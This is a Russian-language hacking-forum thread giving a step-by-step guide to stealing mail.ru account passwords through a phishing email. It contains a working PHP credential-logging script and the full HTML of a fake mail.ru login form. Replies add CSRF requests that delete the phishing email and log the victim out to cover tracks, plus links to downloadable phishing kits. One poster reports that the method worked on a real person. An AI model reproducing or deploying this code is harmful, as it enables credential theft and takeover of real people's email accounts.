[::.INTRO.::] Привет! В этой небольшой статье я расскажу о том, как взломать ящик на mail.ru. Статья предназначена в первую очередь для новичков, в СИ(социальной инженерии ), а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту. Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику ", сами поймете. [::.ACTION.::] Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP. Можно зарегистрироваться на любом из этих(фейки/скамы там соотв. не приветсвуются): *только заранее убедитесь что хостинг поддерживает PHP Code: km.ru nextmail.ru hobby.ru webrise.ru lapin.ru free.dl-hosting.ru hostow.net beplaced.ru 777host.ru paltus.ru miraclehost.ru freebox.ru alfaspace.net k70.ru hosting.promostudio.ru chat.ru maxhost.ru nixup.com e2e.ru noka.ru newmail.ru boom.ru h15.ru hut.ru jino-net.ru pochta.ru unlimhost.ru onepage.ru by.ru sbn.bz yard.ru domainhosting.ru orthodoxy.ru webservis.ru ru-web.net activehost.ru househost.ru bestof.ru addr.ru hosting.dump.ru pesni.ru medbox.ru fatal.ru x5x.ru hopshot.com 5gigs.com wagoo.com orgfree.com awardspace.com bobos.ca www.host.sk zportal.info spaceall.de 3x.ro sretenie.ru dotgeek.org sevhosting.net o2g.net www.jino-net.ru www.nixup.com newmail.ru ho.com.ua/ wallSt.ru hut.ru holm.ru e2e.ru fatal.ru host.sk ut.ru H1.ru Hostmos.ru Webm.ru Rdcom.ru narod.ru front.ru nm.ru chat.ru boom.ru by.ru После регистрации: Во-первых, нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл): PHP: <?php error_reporting(0); $f=fopen("mail.txt","at"); # файл куда сохранять flock($f,2); fputs($f,$_GET['Login']."@"); #логин fputs($f,$_GET['Domain']); #домен fputs($f,";".$_GET['Password']."\n"); # пароль flock($f,3); fclose($f); header("Location: http://win.mail.ru/cgi-bin/readmsg?id=121112312"); Рассмотрим скрипт поподробнее: PHP: header("Location: http://win.mail.ru/cgi-bin/readmsg?id=121112312"); Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке. Сохраним в файл mes.php и зальем на хостинг. Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777, что позволит нам записывать логины в файл. Приступим к самому письму, которое мы будем отправлять жертве на мыло. Код письма: PHP: <table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr> <td id=aj_body> <div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"> <table cellpadding=0 cellspacing=0 border=0 class=login> <tr> <td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td> </tr> </table><font color=00;33;66 FACE="Arial" > <h4 >Авторизация</h4> </font> <table cellpadding=0 cellspacing=0 border=0 class=login> <form method="GET" action="http://адрес фейка/mes.php"> <input type="hidden" name="mail" value="1"> <tr> <td width=75> <img src=http://img.mail.ru/0.gif height=1><br>Имя </td> <td width=150> <input type="text" name="Login"> </td> <td width=75> <select name="Domain"> <option value="mail.ru" SELECTED>@mail.ru</option> <option value="inbox.ru">@inbox.ru</option> <option value="list.ru" >@list.ru</option> <option value="bk.ru" >@bk.ru</option> </select> </td> </tr> <tr> <td> Пароль </td> <td> <input type="password" name="Password"> </td> <td> <a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a> </td> </tr> <tr> <td> </td> <td> <input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label> </td> <td> </td> </tr> <tr> <td> </td> <td> <input type="Submit" value=" Войти " xstyle="margin-top:4px"> </td> <td> </td> </tr></form> </table><br><br> Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br> Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта. <base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div> Укажите в параметре action тега form - адресс вашего сайта,который вы зарегистрировали выше, и путь к снифферу mes.php. [!] Надо обратить внимание на то, что данные должны передоваться методом "GET", Иначе ничего не выйдет. Теперь остается отправить жертве письмо, желательно с подменой адреса. Сделать это можно, например тут: Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля. Если жертва введет свои логин и пароль, то вам повезло. Узнать пароли вы сможете в файле mail.txt. [::.END.::]
видел много материала по фейкам но все было както разброшено.. сдесь все собрано и пошагово разсмотрено. вобшем ГУД.)
в принципе у каждого метода есть свои плюсы и минусы (без этого просто никак) юудь то ббрут или протроянивание или фейки поставил + статья наиболее полная для новичка
Статья не супер, но из-за таких как вы, считающих себя гуру, новые статьи редко пишутся! Людям просто не хочется писать статьи во избежании такой тупой критики... Что это за аргумент? -ерунда, говно и т.д. Напиши свой способ. Сам сталкивался с такой штукой, пишешь статью, а ее удаляют. Причиной назвали сложность осуществления предложенного метода... Я чуть под стол не упал... Я считаю не нужно отбивать у людей желание писать, хоть что то...
Моё мнение: Не сложно,просто. Но таких тем действительно было оч много. Это называеться фейк и автор ничё про это не сказал. Но и в тоже время от этого фейка мало что будет поскольку я чёто запутолся тем что будет отпровляться пись,а тама будет запрос авторизации. и тутже тама будет висеть табличка от администрации.
ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...
ИМХО, СИ легче юзать на Яндексе. Поясню: - Отсутствуют какие-либо предупреждения по поводу того что пароль можно украсть - Однако присутствуют условия при реге мыла (нельзя регистрировать мыло с вставкой admin, support, yandex). Но это легко обойти... Можно зарегать мыло типа emailhelp, emailbot и тд Вообщем мну предпочитает яндекс. Хотя мэйл тоже слабо защищен...
Тема немного старовата, но я вставлю свои 5 копеек 1)Зачем передовать всё через GET это палевно, меняем на POST и всё. 2)Зачем перенаправлять юзера на непонятное письмо http://win.mail.ru/cgi-bin/readmsg?id=121112312 если мы можем посмотреть refer и отправить его обратно на наше письмо, но ябы селал подругому... Из рефера получаем ID письма (буду помечать его как messid), в фрейме грузим http://win.mail.ru/cgi-bin/movemsg?remove&id=messid это перенесёт письмо в корзину, потом вызываем http://win.mail.ru/cgi-bin/movemsg?remove&id=messid&confirm=on Это спросит хотимли мы удалить навсегда письмо? Дальше вот такая форма HTML: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1250" /> <title>x3k</title> </head> <body onload="pe4enkiiiii.submit()"> <form action="http://win.mail.ru/cgi-bin/movemsg" method="POST" name="pe4enkiiiii"> <input type="hidden" name="confirm" value="on"> <input type="hidden" name="remove" value="1"> <input type="hidden" name="id" value="[COLOR=Red]messid[/COLOR]"> </form> </body> </html> Это сносит письмо насмерть Дальше в фрейме вызываем http://win.mail.ru/cgi-bin/logout это выход с ящика, потом перенаправляем юзера на http://win.mail.ru/cgi-bin/login Всё, юзверь думает ошибся пассом, заходит, письма нет, ну и *** с ним Не тестировал, токо частично, должно работать... Протестировал, работает ============= ОУ! Даже знаете чо делаем... После того как юзверь прищёл к нам на скрипт делаем 2 фрейма, первый 100% http://win.mail.ru/cgi-bin/msglist второй 0% где и будут происходить наши действия, этож ваще безпалевно
Немного доработал скрипт, качать отсюда: http://slil.ru/26028341 (пасс antichat) эту не качай, качай на 2 поста ниже, там 2 версия В скрипте 5 файлов index.php - скрипт, записывающий инфу в логи frame.php - скрипт, удаляющий письмо log.txt - подробный лог minilog.txt - пишется мыло и пасс readme.html - инструкция с HTML кодом который надо отсылать В общем заливаем скрипты куда-то, читаем readme редактируем HTML код под себя (для нубов: Чтоб отправить HTML в письме через mail.ru, нмакаем "Написать письмо" там жмакаем "Расширенный формат" вставляем HTML, отправляем) тама отредактировать 1 строку надо - ссылку на сниффер Чел открывает письмо, тама месага типо скриптое письмо, введите логин и пасс, форма очень очень поломаная, но не я её писал, вопросы к ТСу Так вот, чел пишет логин пасс, нажимает вход, логин и пасс идёт нам на скрипт, скрипт записывает логи и пасс в лог, при этом грузятся 2 фрейма, 1 фрейм взод на mail.ru, 2 фрейм получает от скрипта номер письма и 4 раза пытается его удалить (достаточно 2 но бывают лаги) после того как скрипт провёл свои грязные дела он перекидывает пользователя на почту, в которой от письма не осталось и следа и логи и пароль остались у нас, круто, да? P.S> Впервые этим занимаюсь и просто от нечего делать ========= Гы гы, чел в аське повёлся Мля, а это работает оказывается )) Кстате в .htaccess пропишите Code: <files "log.txt"> order allow,deny deny from all </files> <files "minilog.txt"> order allow,deny deny from all </files> Ато не кайф если логи прочитают
понч впринципе неплохо- маленькое дополнение- можно там еще прикрутить снифер- да куки мы неполучим-Но мы точно будем знать открыл ли пользователь наше письмо или он еще в свой ящик незаходил, кстати пользовался- когда снифер от GreenBear был живой и точно знал айпишку- открывшего письмо и забила ли жертва хрен на наш суперфейк))) и стоит ли от нее ждать пассов)))
Сделал, http://slil.ru/26028567 пасс antichat Это так сказать версия 2.0 но как это называется я хз Сами придумайе название +При открытии письма мы узнаем об этом +В инструкцию добавлен javascript, чтоб дого не копаться +Добавлен .htaccess чтоб сами не разбирались что там и куда ===================== Я кстати с год назад придумал и отписал тута новый способ прикола над форумчанами, там вот он и на mail.ru покатит, отсылаем письмо <h1>Ты грязный овце*б </h1> <img src="http://win.mail.ru/cgi-bin/logout"> Такое западло Но можно будет удалить письмо из списка
Пару слов скажу. 1. если картитки отключены, то не работает HTTP_REFERER, соответственно письмо не удаляется. 2. Может я чего не понял, но временно открывается новое окно http://fake.ru/index.php, а его ни как нельзя сделать размерами 0х0 ?
Расскажите пожалуйста, как отправить в формате HTML и с какого ящика (то есть майл рамблер). Пробывал отправлять с клиента The Bat в HTML (ставил формат письма HTML)? но приходит письмо и в нем тупо HTML тэги то етсь не обрабатываеться как код. Прошу помощи.
Дело в том что твой код отправляется как txt Не морочь себе голову и используй скрипт(отправил в личку)